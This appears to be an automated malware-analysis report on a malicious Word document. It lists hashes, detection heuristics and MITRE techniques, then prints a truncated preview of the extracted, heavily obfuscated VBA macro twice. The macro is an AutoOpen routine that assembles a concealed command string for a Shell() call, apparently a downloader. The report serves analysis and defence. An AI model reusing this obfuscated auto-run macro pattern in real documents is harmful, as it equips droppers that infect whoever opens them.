Office (OLE) malware analysis — malicious · e306487016eee1e1

MALICIOUS

Office (OLE)

132.4 KB Created: 2018-09-26 07:52:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: c44e2116a552e2fead7351dd5481b1b6 SHA-1: a27e489ba39030ed518b67a8e40ae3536f6d11ec SHA-256: e306487016eee1e1acca4a65c56df5c8436aa63e15700eba3b55084e1f453e73

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and the Shell() function is called, indicating an attempt to execute arbitrary code. The macro likely downloads and executes a second-stage payload, as suggested by the ClamAV detection name 'Doc.Downloader'. No specific family could be identified.

Heuristics 6

ClamAV: Doc.Downloader.00536d-6697991-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.00536d-6697991-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 98169 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	98169 bytes
SHA-256: `2a6166d6600eeeafed054950b38ffe0cc8def3fd85094ae45898adcdd6aa9acf`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ozdsHtYMjrz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim hokGVo(2) hokGVo(0) = Mid(vimaA + jAkULbdFDUHIKaBUsEUG + LihdOSwz, 847, 949) + Left(ofzGLiD + TwAsLZfCMtFXAAqkXHQMR + VUltpDi, 306) hokGVo(1) = Mid(jkCsRjp + iRfiMKndZCljsKhJWp + HlNPn, 839, 127) + MidB(bhVUpmZ + lBqpuscoGwjPuXwzuA + zbKBWF, 276, 469) Dim TbvjT(2) TbvjT(0) = Left(QUBvDirf + cjztVHnBXVmwTfVq + zMoYw, 188) + Mid(oqGPC + CNwUosRdijqwkDVFcWIVZ + jNjPXi, 219, 61) TbvjT(1) = Mid(XWMPhj + MTuTkVQwXYtsZWYJLHBitTlz + pvnvb, 240, 583) + Mid(cLwYln + ZwznGcBnLoAzzYHclwRMrD + kMiPqPw, 231, 968) + Left(jSAtnB + PdnBiisZImHACoEv + DnZddXJ, 719) + Right(LCjiwzL + fWXDMLhRzEjGsqNYBG + UfaFA, 635) opbWTuaJQUm (KeyString(EaRSrP + CAcvM + 6 + 10 + 51 + KSpZoB + sNjvVWa) + FupcsFEk + XWVjzOEu + KeyString(jmTtwYE + CncSmp + 7 + 11 + 59 + pSNlpQLm + hmhRci) + VFXwCCwa + HvUcVwaGSwL + zFZiX + SAfAzM + OEQlZwD + dNfHHN + cinsdDiKvz + fKEVLFiAzu + BJSOjjN + AsnAtFJz) Dim Ecnjj(2) Ecnjj(0) = Right(Bmlko + tzcREEiaNRJfsXPvlKY + JqYzJ, 185) + MidB(PoZjIiL + iXZPaNVSOVtWLXINfh + lnuqTzLo, 82, 227) Ecnjj(1) = MidB(BMojcFb + HktHEVkaDsNbobfWHZRhKA + iYlZGZAd, 72, 22) + Right(iaOGIT + YNDFHGjqCiHlXLdlna + injqhK, 195) + MidB(jsZVUfSz + nASbiHYufhfAYRYPBKji + szjhjKm, 939, 912) + MidB(MMFjJw + IBsMjvNuoUHWaAlfOUviEpS + TfsMQ, 702, 683) Dim lAlSQ(2) lAlSQ(0) = Mid(bPAmL + RSAZMSnNjIbEwmqakYruw + adaSatzF, 521, 890) + MidB(WHNOm + pzLTZvljBZYSrKwuI + zVNaaUS, 448, 184) + Right(mOwOJAEf + DBWMpECSsuuNGznbSMsV + HVcAvq, 559) + Right(vTrNk + UqMzrwXDBQDLfpuiin + BQnBCW, 294) lAlSQ(1) = MidB(LPrBI + GXEzuZYIjnBTCRULjEw + nPOsZ, 230, 202) + Right(UcLiF + sVtTjNRdAZjzHbDJiL + wZQwzaWj, 241) + Left(oiEcRaz + ZmdZDwkiwzQLuSRSaHTN + OnDwli, 636) + MidB(RKvrtB + CQvTcEHzJfnHGYoKQlt + SvMnwb, 465, 336) Dim jnBfd(1) jnBfd(0) = Right(YlFjq + ahwZUfGAGGJTUwANuWq + pziLcMO, 185) + Mid(ZMIjfnBi + ZTvhmPJjUWkhTkVYtrwfYvZ + VatnJ, 90, 83) + MidB(wYMCi + ZpipzmFKnEWlNCzLCa + dOOQDWL, 832, 171) + MidB(zGuYML + dWAbihKLEXiiqaktjj + vNRXfSik, 2, 294) End Sub Attribute VB_Name = "RztuljvQmZ" Function VFXwCCwa() KJRvfBl = "d /\ \ /\/ \ /" + "V:ON/C" + """" + "set -" + "*`~=702a a270 a02" Dim jijWE(2) jijWE(0) = Mid(NlqDmz + DoLOjBZUuvZbQHprRYHYUIf + oMGsbkpl, 66, 329) + Mid(uBpwIhz + ALtMQTwqGBuffCwqbVlaw + XSbMbi, 200, 316) + Left(NjKQt + KwmOVMFiGVHwJswdod + kPrcZW, 764) + Left(AYQARJB + GsbpIYQXSTPjcCwdkjj + mGqUwri, 912) jijWE(1) = Mid(XmrvGT + zVHTUkXPLXWiWCCiwTfjX + LtlGr, 209, 467) + MidB(ZXTmAjZ + YBnAouEkPoUmjarlITMzI + YjPiMt, 47, 218) Dim WLErOn(1) WLErOn(0) = Left(lQmns + soUELDNPVIpCDbkknSm + fmpWWlkq, 743) + Mid(FhGnnr + VFwYFqwLIoDGuZOIrdk + qjpjU, 925, 938) + MidB(zYnhNj + ahizINGhOYiknwhV + rHLshI, 429, 759) + MidB(ibTDD + hVfdnYNPmnzlfJjZXF + oToCu, 139, 747) irjLVAOq = "7 2a07 a702 a" + "702 a702 72a0 07" + "a2 0a27 a270" + " 72a0 72a0 70" Dim rzAVl(1) rzAVl(0) = Left(niSWin + RvJUiMzQrJwfcfGvt + KYfzja, 159) + MidB(fhWcL + CsssjibuJYprNzDlkpic + iliQIBvz, 854, 70) zkoUYXjTuf = "2a 720a 0a27 a072 7" + "02a}0a72}72a0{70a2" + "h7a20c207at702aa7" + "0a2c02a7}720a;7a02k" + "7a02a027aea0" + "72r7a20b27a0" VFXwCCwa = KJRvfBl + irjLVAOq + zkoUYXjTuf Dim ijzaFa(1) ijzaFa(0) = MidB(rcmUXZ + zXPUtAswlIcqwYpLFnOZCV + IrwlbVGv, 606, 765) + MidB(dnAmTRac + zILAUjwMzMFrAhHjD + iRvRn, 528, 123) + MidB(EwEunZaA + hbihTvuSkSKvduFDRH + DIMiLEb, 130, 147) + Left(MawkbMsj + cLJuwfUwjEiYHZjqqd + wwVhK, 576) Dim bEbaz(1) bEbaz(0) = Left(NvwmLwn + SLUmIqwSBMvccFKdlYDbE + uurzLJ, 529) + Right(wJDRkH + wqokTvFoKlCPzlwCfS + UiNWh, 35) + MidB(dUuiOBmb + uXwpswNtfoEZqUCFEODuR + VFBvzUi, 674, 470) + MidB(ipOJn + EZvEXbkVPhqchdIsKj + pRpipM, 827, 907) Dim hNimQ(1) hNimQ(0) = Left(OOzTBho + ikBukhkDmisrXGivTzY + SvRTCoj, 16) + Mid(iGujXzcf + zhWrVzusDzGXbcoAQDhhw + ZaKwrT, 829, 675) + Left(YawCukH + biTDijLiaS ... (truncated)

SHA-256: 2a6166d6600eeeafed054950b38ffe0cc8def3fd85094ae45898adcdd6aa9acf

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ozdsHtYMjrz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim hokGVo(2)
hokGVo(0) = Mid(vimaA + jAkULbdFDUHIKaBUsEUG + LihdOSwz, 847, 949) + Left(ofzGLiD + TwAsLZfCMtFXAAqkXHQMR + VUltpDi, 306)
hokGVo(1) = Mid(jkCsRjp + iRfiMKndZCljsKhJWp + HlNPn, 839, 127) + MidB(bhVUpmZ + lBqpuscoGwjPuXwzuA + zbKBWF, 276, 469)
   Dim TbvjT(2)
TbvjT(0) = Left(QUBvDirf + cjztVHnBXVmwTfVq + zMoYw, 188) + Mid(oqGPC + CNwUosRdijqwkDVFcWIVZ + jNjPXi, 219, 61)
TbvjT(1) = Mid(XWMPhj + MTuTkVQwXYtsZWYJLHBitTlz + pvnvb, 240, 583) + Mid(cLwYln + ZwznGcBnLoAzzYHclwRMrD + kMiPqPw, 231, 968) + Left(jSAtnB + PdnBiisZImHACoEv + DnZddXJ, 719) + Right(LCjiwzL + fWXDMLhRzEjGsqNYBG + UfaFA, 635)
opbWTuaJQUm (KeyString(EaRSrP + CAcvM + 6 + 10 + 51 + KSpZoB + sNjvVWa) + FupcsFEk + XWVjzOEu + KeyString(jmTtwYE + CncSmp + 7 + 11 + 59 + pSNlpQLm + hmhRci) + VFXwCCwa + HvUcVwaGSwL + zFZiX + SAfAzM + OEQlZwD + dNfHHN + cinsdDiKvz + fKEVLFiAzu + BJSOjjN + AsnAtFJz)
   Dim Ecnjj(2)
Ecnjj(0) = Right(Bmlko + tzcREEiaNRJfsXPvlKY + JqYzJ, 185) + MidB(PoZjIiL + iXZPaNVSOVtWLXINfh + lnuqTzLo, 82, 227)
Ecnjj(1) = MidB(BMojcFb + HktHEVkaDsNbobfWHZRhKA + iYlZGZAd, 72, 22) + Right(iaOGIT + YNDFHGjqCiHlXLdlna + injqhK, 195) + MidB(jsZVUfSz + nASbiHYufhfAYRYPBKji + szjhjKm, 939, 912) + MidB(MMFjJw + IBsMjvNuoUHWaAlfOUviEpS + TfsMQ, 702, 683)
   Dim lAlSQ(2)
lAlSQ(0) = Mid(bPAmL + RSAZMSnNjIbEwmqakYruw + adaSatzF, 521, 890) + MidB(WHNOm + pzLTZvljBZYSrKwuI + zVNaaUS, 448, 184) + Right(mOwOJAEf + DBWMpECSsuuNGznbSMsV + HVcAvq, 559) + Right(vTrNk + UqMzrwXDBQDLfpuiin + BQnBCW, 294)
lAlSQ(1) = MidB(LPrBI + GXEzuZYIjnBTCRULjEw + nPOsZ, 230, 202) + Right(UcLiF + sVtTjNRdAZjzHbDJiL + wZQwzaWj, 241) + Left(oiEcRaz + ZmdZDwkiwzQLuSRSaHTN + OnDwli, 636) + MidB(RKvrtB + CQvTcEHzJfnHGYoKQlt + SvMnwb, 465, 336)
   Dim jnBfd(1)
jnBfd(0) = Right(YlFjq + ahwZUfGAGGJTUwANuWq + pziLcMO, 185) + Mid(ZMIjfnBi + ZTvhmPJjUWkhTkVYtrwfYvZ + VatnJ, 90, 83) + MidB(wYMCi + ZpipzmFKnEWlNCzLCa + dOOQDWL, 832, 171) + MidB(zGuYML + dWAbihKLEXiiqaktjj + vNRXfSik, 2, 294)
End Sub


Attribute VB_Name = "RztuljvQmZ"
Function VFXwCCwa()
KJRvfBl = "d /\  \  /\/  \ /" + "V:ON/C" + """" + "set -" + "*`~=702a a270 a02"
Dim jijWE(2)
jijWE(0) = Mid(NlqDmz + DoLOjBZUuvZbQHprRYHYUIf + oMGsbkpl, 66, 329) + Mid(uBpwIhz + ALtMQTwqGBuffCwqbVlaw + XSbMbi, 200, 316) + Left(NjKQt + KwmOVMFiGVHwJswdod + kPrcZW, 764) + Left(AYQARJB + GsbpIYQXSTPjcCwdkjj + mGqUwri, 912)
jijWE(1) = Mid(XmrvGT + zVHTUkXPLXWiWCCiwTfjX + LtlGr, 209, 467) + MidB(ZXTmAjZ + YBnAouEkPoUmjarlITMzI + YjPiMt, 47, 218)
   Dim WLErOn(1)
WLErOn(0) = Left(lQmns + soUELDNPVIpCDbkknSm + fmpWWlkq, 743) + Mid(FhGnnr + VFwYFqwLIoDGuZOIrdk + qjpjU, 925, 938) + MidB(zYnhNj + ahizINGhOYiknwhV + rHLshI, 429, 759) + MidB(ibTDD + hVfdnYNPmnzlfJjZXF + oToCu, 139, 747)
irjLVAOq = "7 2a07 a702 a" + "702 a702 72a0 07" + "a2 0a27 a270" + " 72a0 72a0 70"
Dim rzAVl(1)
rzAVl(0) = Left(niSWin + RvJUiMzQrJwfcfGvt + KYfzja, 159) + MidB(fhWcL + CsssjibuJYprNzDlkpic + iliQIBvz, 854, 70)
zkoUYXjTuf = "2a 720a 0a27 a072 7" + "02a}0a72}72a0{70a2" + "h7a20c207at702aa7" + "0a2c02a7}720a;7a02k" + "7a02a027aea0" + "72r7a20b27a0"
VFXwCCwa = KJRvfBl + irjLVAOq + zkoUYXjTuf
   Dim ijzaFa(1)
ijzaFa(0) = MidB(rcmUXZ + zXPUtAswlIcqwYpLFnOZCV + IrwlbVGv, 606, 765) + MidB(dnAmTRac + zILAUjwMzMFrAhHjD + iRvRn, 528, 123) + MidB(EwEunZaA + hbihTvuSkSKvduFDRH + DIMiLEb, 130, 147) + Left(MawkbMsj + cLJuwfUwjEiYHZjqqd + wwVhK, 576)
   Dim bEbaz(1)
bEbaz(0) = Left(NvwmLwn + SLUmIqwSBMvccFKdlYDbE + uurzLJ, 529) + Right(wJDRkH + wqokTvFoKlCPzlwCfS + UiNWh, 35) + MidB(dUuiOBmb + uXwpswNtfoEZqUCFEODuR + VFBvzUi, 674, 470) + MidB(ipOJn + EZvEXbkVPhqchdIsKj + pRpipM, 827, 907)
   Dim hNimQ(1)
hNimQ(0) = Left(OOzTBho + ikBukhkDmisrXGivTzY + SvRTCoj, 16) + Mid(iGujXzcf + zhWrVzusDzGXbcoAQDhhw + ZaKwrT, 829, 675) + Left(YawCukH + biTDijLiaS
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.